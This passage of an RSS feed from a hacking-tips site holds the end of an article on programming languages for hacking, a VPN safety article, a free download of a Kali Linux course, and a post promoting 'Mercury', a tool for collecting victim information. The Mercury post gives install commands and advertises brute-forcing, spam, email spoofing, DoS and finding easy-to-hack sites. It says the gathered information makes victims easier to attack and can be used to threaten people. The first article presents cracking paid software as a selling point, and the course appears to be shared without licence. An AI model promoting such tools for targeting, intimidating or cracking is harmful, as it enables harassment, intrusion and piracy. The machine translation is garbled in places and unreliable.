<p>Java is the most widely used programming language in the industry and was originally released with the tagline <strong>“write once, run anywhere”</strong>  (Write once, run anywhere) aims to highlight its cross-platform capabilities.  It is because of the “WORA” function that Java is the perfect programming language for hacking PCs, mobile devices and web servers, and its versatility is appreciated by hackers all over the world.  It is the best programming language to hack into mobile devices.  Using Java, one can create tools that act as backdoor exploits or even exploits capable of killing entire computer systems.</p>
<h3 id="ftoc-diem-noi-bat-2" class="ftwp-heading"><span style="color: #339966;"><strong>Highlights:</strong></span></h3>
<p>Java allows the development of advanced Ethical Hacking programs for advanced White Hat Hackers.  It is a dynamic language and hacking programs are written on a system that can run on any platform that supports Java.  Java is widely used to reverse engineer paid software, etc.</p>
<h2 id="ftoc-ruby" class="ftwp-heading">Ruby</h2>
<p><strong>Ruby</strong> is a language <strong>web programming</strong> simple yet complex, syntactically very similar to Python, and thus gaining popularity among ethical hackers.  Ruby is one of the best languages ​​for Whitehat Hacking as it offers outstanding flexibility while exploiting vulnerabilities Ruby is easy to learn but hard to master and that&#8217;s why so many companies like Shopify, Twitter, GitHub, etc. are looking for people who know Ruby.</p>
<h3 id="ftoc-diem-noi-bat-3" class="ftwp-heading"><span style="color: #339966;"><strong>Highlights</strong>:</span></h3>
<p>Ruby is an essential language to learn while mastering the art of writing effective exploits, it is often used by veteran hackers to write CGI scripts after a network has been compromised.  Many next-generation web applications are built with the Rails foundation in mind, which makes Ruby the best choice for infiltration.</p>
<h2 id="ftoc-javascript" class="ftwp-heading">JavaScript</h2>
<p><strong>JavaScript</strong> widely used for client-side programming and web development purposes.  With the recent introduction of <strong>Node.js,</strong> JavaScript has become one of the best programming languages ​​for hacking web applications as it provides a wider field of exploitation for hackers.</p>
<p>Security professionals often use JavaScript to develop hack programs on many websites to mimic the actions of a black hat hacker.  Powerful hacking tools like Burp Suite also rely on JavaScript code to perform exploits and detect vulnerabilities in the system.  It can be a bit difficult to learn for beginners but can certainly be mastered in a while.</p>
<p style="text-align: center;"><span style="text-decoration: underline;"><strong><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fshare-khoa-hoc-javascript%2F" rel="noopener noreferrer" class="local-link">Download free JavaScript course</a></strong></span></p>
<h3 id="ftoc-diem-noi-bat-4" class="ftwp-heading"><span style="color: #339966;"><strong>Highlights: </strong></span></h3>
<p>Using JavaScript, Hackers can easily manipulate the browser&#8217;s DOM, making it a possible solution for building internet worms.  Proper understanding of JavaScript can <strong>Allows Hackers to Find Vulnerabilities</strong> in almost any web application because there are hardly any online projects that do not use JavaScript or its libraries.</p>
<h2 id="ftoc-c-c" class="ftwp-heading">C/C++</h2>
<p>The C language is the mother of all programming languages, and C++ is a high-level programming extension of C with additional features to simplify programming.  C is a Hacker Programming Language that anyone who is fluent in will be extremely good at it.</p>
<p>Despite being one of the first programming languages, C/C++ is highly preferred for cracking corporate software that has proprietary licenses and requires paid activation.  This is the best choice for exploiting desktop software and reverse engineering their features.  They provide great functionality and control with a set of predefined classes.  The low-level C language allows security professionals to access and manipulate system hardware and lower-level resources.</p>
<h3 id="ftoc-diem-noi-bat-5" class="ftwp-heading"><span style="color: #339966;"><strong>Highlights: </strong></span></h3>
<p>The object-oriented nature of C/C++ allows hackers to write hacking programs quickly and efficiently.  In fact, many modern Whitehat Hacking programs are built on C/C++.  Hackers around the world actively write code in these languages ​​to find bugs in systems or get information about potential targets.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;23441&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/top-5-programming-languages-white-hat-hackers-should-learn/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2020/11/ngon-ngu-lap-trinh-hacker-nen-hoc.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Learn How VPN Protects You From Hackers</title>
		<link>https://en.anonyviet.com/learn-how-vpn-protects-you-from-hackers/</link>
					<comments>https://en.anonyviet.com/learn-how-vpn-protects-you-from-hackers/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Mon, 30 Jan 2023 19:33:17 +0000</pubDate>
				<category><![CDATA[Tips]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[Learn]]></category>
		<category><![CDATA[Protects]]></category>
		<category><![CDATA[VPN]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=6947</guid>

					<description><![CDATA[The worldwide spread of the COVID-19 pandemic is responsible for a 238% increase in the rate of cyberattacks in 2020. This leaves many users bitter about how to protect themselves from hackers who are stalking and hacking them at any time. Although there is no guarantee that you are 100% protected when surfing the net, [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>The worldwide spread of the COVID-19 pandemic is responsible for a 238% increase in the rate of cyberattacks in 2020.  This leaves many users bitter about how to protect themselves from hackers who are stalking and hacking them at any time.  Although there is no guarantee that you are 100% protected when surfing the net, but <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2F%3Fs%3Dvpn" rel="noopener" class="local-link">VPN network</a> will help you be more secure when you are using the internet in a safer and more secure way.  In this article, I will learn how VPN protects you from Hackers?</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h2 id="ftoc-vpn-ho-tro-cong-viec-tu-xa" class="ftwp-heading">VPN supports remote work</h2>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2020%2F12%2Fvpn-giup-lam-viec-tu-xa.jpeg" rel="noopener" class="local-link"><img decoding="async" class="aligncenter wp-image-23826 size-full" src="https://anonyviet.com/wp-content/uploads/2020/12/vpn-giup-lam-viec-tu-xa.jpeg" alt="VPN supports remote work" width="647" height="254" srcset="https://anonyviet.com/wp-content/uploads/2020/12/vpn-giup-lam-viec-tu-xa.jpeg 647w, https://anonyviet.com/wp-content/uploads/2020/12/vpn-giup-lam-viec-tu-xa-300x118.jpeg 300w" sizes="(max-width: 647px) 100vw, 647px" title="Learn How VPN Protects You From Hackers 8"/></a></p>
<p>Many people have had to leave their offices to stay home and work because of the COVID-19 pandemic.</p>
<p>This means that protecting your home from hackers is one of the top priorities.  Without the protection of the VPN network, you can lose your customer data due to hacker attack and steal it.</p>
<p>Not like before.  In the age of Industry 4.0 we can now connect to the internet using different things including smartphones, smart thermostats, cameras, smart TVs, virtual assistants – and even refrigerators. clever.</p>
<p>All of these devices can be used by hackers to attack or pinpoint your exact location, because luckily you need a VPN to protect your Internet.</p>
<p>With a VPN, your Internet connection remains private, and by activating the VPN, you will no longer expose your IP address to the world.</p>
<h2 id="ftoc-vpn-bao-ve-ban-khoi-hacker-nhu-the-nao" class="ftwp-heading">How does a VPN protect you from Hackers?</h2>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2020%2F12%2Fcach-vpn-bao-ve-ban.png" rel="noopener" class="local-link"><img post-id="6947" fifu-featured="1" decoding="async" loading="lazy" class="aligncenter wp-image-23825 size-full" src="https://anonyviet.com/wp-content/uploads/2020/12/cach-vpn-bao-ve-ban.png" alt="Learn How VPN Protects You From Hackers" title="Learn How VPN Protects You From Hackers" width="428" height="225" srcset="https://anonyviet.com/wp-content/uploads/2020/12/cach-vpn-bao-ve-ban.png 428w, https://anonyviet.com/wp-content/uploads/2020/12/cach-vpn-bao-ve-ban-300x158.png 300w" sizes="auto, (max-width: 428px) 100vw, 428px" title="Learn How VPN Protects You From Hackers 9"/></a></p>
<p><strong>There are two main ways that VPNs protect you from personal information theft:</strong></p>
<p><span style="color: #0000ff;"><strong>The first way</strong></span>  that&#8217;s encryption.  The VPN will encrypt your data before sending it to another device, and then that data will be decrypted when it reaches its destination.</p>
<p>It&#8217;s virtually impossible to decipher, so even if someone did get your hands on it, all of it would become cluttered and unreadable, rendering it useless.</p>
<p><span style="color: #0000ff;"><strong>The second way</strong></span>  that VPN protects your information is through IP address masking.  Experienced people can use this information to determine your home address.</p>
<p>When you use a VPN, all your online activities go through the VPN server, ensuring your real IP address is completely hidden.</p>
<h2 id="ftoc-cac-cach-khac-de-bao-ve-ban-khoi-hacker" class="ftwp-heading">Other ways to protect yourself from Hackers</h2>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2020%2F12%2Fwhy-vpn-min-1.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-23827 size-full" src="https://anonyviet.com/wp-content/uploads/2020/12/why-vpn-min-1.jpg" alt="Other ways to protect yourself from hackers" width="600" height="315" srcset="https://anonyviet.com/wp-content/uploads/2020/12/why-vpn-min-1.jpg 600w, https://anonyviet.com/wp-content/uploads/2020/12/why-vpn-min-1-300x158.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px" title="Learn How VPN Protects You From Hackers 10"/></a></p>
<p>While it is undeniable that VPN provides strong protection, it is a layer of safety that prevents hackers from attacking/infiltrating your computer, but there are also ways to help you protect your computer. when using the internet:</p>
<ul>
<li><strong>Use anti-virus software</strong> – Although hackers may try to put a virus on your device, you can use anti-virus software to detect and remove it.</li>
<li><strong>Avoid using public Wi-Fi</strong> – You should never connect to a free hotspot without using a VPN, especially if you plan to access sensitive data or perform some action related to your bank account or online shopping. online because it could expose you to information.</li>
<li><strong>Update your software</strong> – Many applications come with bugs that the developers of that software only discover after the software has been published.  Make sure to keep all your software up to date to ensure you patch any potential security holes.</li>
<li><strong>Enable firewall</strong> Firewalls, although not completely preventing hackers from attacking your computer, can make it difficult for you to chew your breath.</li>
</ul>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;23744&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/learn-how-vpn-protects-you-from-hackers/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2020/12/cach-vpn-bao-ve-ban.png" medium="image"></media:content>
            	</item>
		<item>
		<title>Download Kali Linux Basics for Hackers &#8211; Learn Kali Linux for Beginners</title>
		<link>https://en.anonyviet.com/download-kali-linux-basics-for-hackers-learn-kali-linux-for-beginners/</link>
					<comments>https://en.anonyviet.com/download-kali-linux-basics-for-hackers-learn-kali-linux-for-beginners/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sun, 29 Jan 2023 16:59:08 +0000</pubDate>
				<category><![CDATA[Tips]]></category>
		<category><![CDATA[Basics]]></category>
		<category><![CDATA[beginners]]></category>
		<category><![CDATA[Download]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[Kali]]></category>
		<category><![CDATA[Learn]]></category>
		<category><![CDATA[Linux]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=6296</guid>

					<description><![CDATA[Kali Linux Basics for Hackers is a beginner&#8217;s course to learn Kali Linux to get on the hacker path. If you are a beginner in security or network administration, you must have heard of Kali Linux, an operating system specifically for Hackers. The feature of Kali linux is that it has built-in Hack and Pentest [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p><strong>Kali Linux Basics for Hackers is a beginner&#8217;s course to learn Kali Linux to get on the hacker path.  If you are a beginner in security or network administration, you must have heard of Kali Linux, an operating system specifically for Hackers.  The feature of Kali linux is that it has built-in Hack and Pentest tools, everything is already set up, just open and use.  But some of you who are not familiar with Linux may still be confused with the operating system.  The Kali Linux Basics for Hackers course sold on Udemy is the most basic content for beginners.  With this course you will get acquainted with the basics of Kali Linux step by step and how to use it.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h2>Download Kali Linux Basics for Hackers Course</h2>
<p>This course currently has 14,107 students enrolled and is rated 3.9* on Udemy.  You only need to spend 1 hour and 20 minutes to grasp the most basic things of kali Linux for Pentesting and Hacking.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F04%2Fdonwload-Kali-Linux-Basics-for-Hackers.jpg" rel="noopener" class="local-link"><img post-id="6296" fifu-featured="1" decoding="async" class="aligncenter size-full wp-image-26314" src="https://anonyviet.com/wp-content/uploads/2021/04/donwload-Kali-Linux-Basics-for-Hackers.jpg" alt="Download Kali Linux Basics for Hackers &#8211; Learn Kali Linux for Beginners" title="Download Kali Linux Basics for Hackers &#8211; Learn Kali Linux for Beginners" width="599" height="316" srcset="https://anonyviet.com/wp-content/uploads/2021/04/donwload-Kali-Linux-Basics-for-Hackers.jpg 599w, https://anonyviet.com/wp-content/uploads/2021/04/donwload-Kali-Linux-Basics-for-Hackers-300x158.jpg 300w" sizes="(max-width: 599px) 100vw, 599px" title="Download Kali Linux Basics for Hackers - Learn Kali Linux for Beginners 6"/></a></p>
<p>If you&#8217;re starting to learn about cybersecurity — especially in attack security testing (penetration testing) — you&#8217;re bound to come across the Kali Linux operating system.  Kali Linux has a lot of features and tools that make the job of a hacker or security engineer a little easier when experimenting with attacking a system.  There are many tools and scripts that help you quickly perform various tasks, such as gathering information about your target, performing network scans, and even exploiting and attacking the system (metasploit).  You will encounter some difficulties when you first get used to the Linux environment.  So In the course Kali Linux Basics for Hackers, you will be guided to use the following content:</p>
<ul>
<li>Linux Basics</li>
<li>Basic network configuration</li>
<li>Manage users and user groups</li>
<li>Service Configuration</li>
</ul>
<div align="center"><strong>Lesson details include:</strong></p>
<table style="width: 34.2082%;" border="1style=&quot;border-collapse:" align="center">
<tbody>
<tr style="height: 21px;">
<td style="width: 25.8449%; height: 21px; text-align: center;"><strong>Lesson</strong></td>
<td style="width: 12.0609%; height: 21px; text-align: center;"><strong>Time</strong></td>
</tr>
<tr style="height: 21px;">
<td style="width: 25.8449%; height: 21px; text-align: center;">Introduction</td>
<td style="width: 12.0609%; height: 21px; text-align: center;">04:34</td>
</tr>
<tr style="height: 17px;">
<td style="width: 25.8449%; height: 17px; text-align: center;">Building a Lab: Virtual Box</td>
<td style="width: 12.0609%; height: 17px; text-align: center;">04:36</td>
</tr>
<tr style="height: 17px;">
<td style="width: 25.8449%; height: 17px; text-align: center;">Deploying a Kali Linux VM</td>
<td style="width: 12.0609%; height: 17px; text-align: center;">07:43</td>
</tr>
<tr style="height: 17px;">
<td style="width: 25.8449%; height: 17px; text-align: center;">Linux Basics</td>
<td style="width: 12.0609%; height: 17px; text-align: center;">21:15</td>
</tr>
<tr style="height: 17px;">
<td style="width: 25.8449%; height: 17px; text-align: center;">Basic Network Configuration</td>
<td style="width: 12.0609%; height: 17px; text-align: center;">14:28</td>
</tr>
<tr style="height: 17px;">
<td style="width: 25.8449%; height: 17px; text-align: center;">Users and Group Management</td>
<td style="width: 12.0609%; height: 17px; text-align: center;">09:44</td>
</tr>
<tr style="height: 17px;">
<td style="width: 25.8449%; height: 17px; text-align: center;">Services Configuration</td>
<td style="width: 12.0609%; height: 17px; text-align: center;">17:50</td>
</tr>
</tbody>
</table>
</div>
<p style="text-align: left;">The course is shared by Anyviet for free, the success or failure of the study is no longer up to you.  You need to watch the full Videos, don&#8217;t skim through even the operations you already know, because you may miss some important details that you have not learned.</p>
<p style="text-align: center;"><span style="font-size: 18pt;"><strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.fshare.vn%2Ffile%2FR8KYSR9NA7VJ" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Download Course</a></strong></span></p>
<p style="text-align: center;"><strong>Password: anonyviet.com</strong></p>
<p>Kali Linux Basics for Hackers is just a small part to start the path to becoming a Hacker, you can refer to some courses AnonyViet shares about <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fcategory%2Fthu-thuat%2Fkhoa-hoc%2F" rel="noopener" class="local-link">Advanced Hacking</a> to increase knowledge.  If you still don&#8217;t know<a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Flam-the-nao-de-tro-thanh-hacker%2F" rel="noopener" class="local-link"> How to become a Hacker</a>try to master the basics of Networking, Linux, and programming.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;26311&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/download-kali-linux-basics-for-hackers-learn-kali-linux-for-beginners/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/04/donwload-Kali-Linux-Basics-for-Hackers.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Mercury &#8211; Tool used by Hackers to collect victim information</title>
		<link>https://en.anonyviet.com/mercury-tool-used-by-hackers-to-collect-victim-information/</link>
					<comments>https://en.anonyviet.com/mercury-tool-used-by-hackers-to-collect-victim-information/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sun, 29 Jan 2023 02:03:07 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[collect]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[Information]]></category>
		<category><![CDATA[Mercury]]></category>
		<category><![CDATA[tool]]></category>
		<category><![CDATA[victim]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=5924</guid>

					<description><![CDATA[Hackers always monitor and collect victim information before attacking them. For information stored on websites or computers that cannot be eavesdropped. Hackers will use the support virus to collect information on the victim&#8217;s computer. Join the channel Telegram of the AnonyViet 👉 Link 👈 You want to gather information faster and more complete, but it [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p>Hackers always monitor and collect victim information before attacking them.  For information stored on websites or computers that cannot be eavesdropped.  Hackers will use the support virus to collect information on the victim&#8217;s computer.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>You want to gather information faster and more complete, but it doesn&#8217;t take long.  Then you need to use Tool Hack to help you do this safely and quickly.  That&#8217;s why today I write this article to share with you Mercury Tool &#8211; Hacker&#8217;s collection tool.</p>
<p>This program will help you to collect extremely important information of the victim.  This information will make it easier to attack them.  You can even use the information to threaten someone.</p>
<p>This is the user interface of Mercury Tool</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F09%2FDoor404_1_Header1.png" rel="noopener" class="local-link"><img post-id="5924" fifu-featured="1" decoding="async" class="aligncenter size-full wp-image-12743" src="https://anonyviet.com/wp-content/uploads/2018/09/Door404_1_Header1.png" alt="Mercury &#8211; Tool used by Hackers to collect victim information" title="Mercury &#8211; Tool used by Hackers to collect victim information" width="640" height="383" srcset="https://anonyviet.com/wp-content/uploads/2018/09/Door404_1_Header1.png 640w, https://anonyviet.com/wp-content/uploads/2018/09/Door404_1_Header1-300x180.png 300w" sizes="(max-width: 640px) 100vw, 640px" title="Mercury - Tool used by Hackers to collect victim information 6"/></a></p>
<h3 id="ftoc-yeu-cau-he-thong" class="ftwp-heading">System Requirements</h3>
<p>Mercury is an information gathering program written and operated on the Linux kernel operating system.  Works well on Linux environments and Linux Distros.  Here are the commands to Clone Repo and install the program to use.</p>
<pre class="theme:cg-cookie lang:default decode:true">apt-get install python2&#13;
git clone https://www.github.com/MetaChar/Mercury&#13;
pip install -r requirements.txt</pre>
<h3 id="ftoc-cac-tinh-nang-cua-mercury" class="ftwp-heading">Features of Mercury</h3>
<p><b><span class="">BruteForce</span></b><br /><span class="">Mercury uses</span><span class=""> Selenium</span><span class=""> to autofill</span><span class=""> password</span><span class=""> into the website.</span></p>
<p><b><span class="">GeoLocation</span></b><br /><span class="">Gelocation allows users to pin the exact location of an IP address.<br />From there, you can trace the subject&#8217;s home address or the area in which the subject lives.</span></p>
<p><b><span class="">SMS Spam</span></b><br />Spam spam to the victim&#8217;s Gmail.</p>
<p><b><span class="">Email Spoof Email</span></b><br />Send anonymous emails to victims.</p>
<p><b><span class="">Check out Website Exist</span></b><br /><span class="">Mercury checks if the website is real</span></p>
<p><b><span class="">Check if the site exists or not</span></b><br /><span class="">Check if the website is online or not.  Exist or not?</span></p>
<p><b><span class="">Encrypt text into Hash</span></b><br />Convert the text you want into a Hash code.</p>
<p><b><span class="">Hex Encode/Decode</span></b><br />Hex encoding and decoding.</p>
<p><b><span class="">What&#8217;s Ip &#038; Mac</span></b><br />Displays the Mac address and IP address.</p>
<p><b>Download Additional Tools</b><br />Support downloading 16 more tools like hydra, metasploit and nmap</p>
<p><b>Github Cloner &#038; Pip Intsaller</b><br />Install Pips and Github repos.</p>
<p><b>Website Cloner</b><br />Clone (get) the source code of any website.</p>
<p><b>IP Address From Website</b><br />Check IP address from website.</p>
<p><b>nmap</b><br />Nmap must be pre-installed.</p>
<p><b>DOS</b><br />Dos attack with packets</p>
<p><b>Anon Webbrowser</b><br />Download or post to Chrome with a proxy</p>
<p><b>Google Dorks</b><br />Look for sites that are easy to hack.</p>
<p><b>Admin Panel</b><br />Support tracing the admin page if it is in the victim&#8217;s browsing list.</p>
<h3 id="ftoc-download-mercury" class="ftwp-heading" style="text-align: center;">Download Mercury</h3>
<p style="text-align: right;">Good luck<br />Lmint.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;11251&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/mercury-tool-used-by-hackers-to-collect-victim-information/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2018/09/Door404_1_Header1.png" medium="image"></media:content>
            	</item>
	</channel>
</rss>
